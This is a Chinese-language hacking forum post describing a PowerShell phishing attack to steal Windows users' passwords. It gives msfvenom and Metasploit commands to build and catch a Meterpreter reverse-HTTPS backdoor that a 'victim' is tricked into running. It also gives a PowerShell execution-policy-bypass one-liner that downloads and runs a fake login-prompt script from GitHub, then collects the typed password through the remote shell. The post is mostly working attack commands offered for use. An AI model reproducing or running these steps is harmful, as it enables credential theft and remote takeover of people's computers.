跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

powershell网络钓鱼获取用户密码

精选回复

发布于

1.powershell网络钓鱼脚本:

https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1

2.MSF下生产一个后门文件,通过上传或者其他方式让其受害者点击

Msfvenom -p windows/meterpreter/reverse_https

  lhost = 192.168.1.138  lport = 4444 -f exe> /opt/bk.exe

2.通过MSF获取远程目标受害者主机的反弹shhell:

msf> use multi/handler

msf exploit(handler )> set payload windows/meterpreter/reverse_https

msf exploit(handler )> set lhost 192.168.1.138

msf exploit(handler )> set lport 4444

msf exploit(handler )> exploit

 1049983-20170811132051773-226814875.png

 

3.powershel远程下载并执行:

powershell.exe -ep bypass -c IEX ((New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/enigma0x3/Invoke-LoginPrompt/master/Invoke-LoginPrompt.ps1

’)); Invoke-LoginPrompt

4.目标受害者远程登录:

 1049983-20170811132104210-543079158.png

 

5.一旦成功登录,即可在msf反弹shell中看到密码:

 1049983-20170811132111788-1331126846.png

 



创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。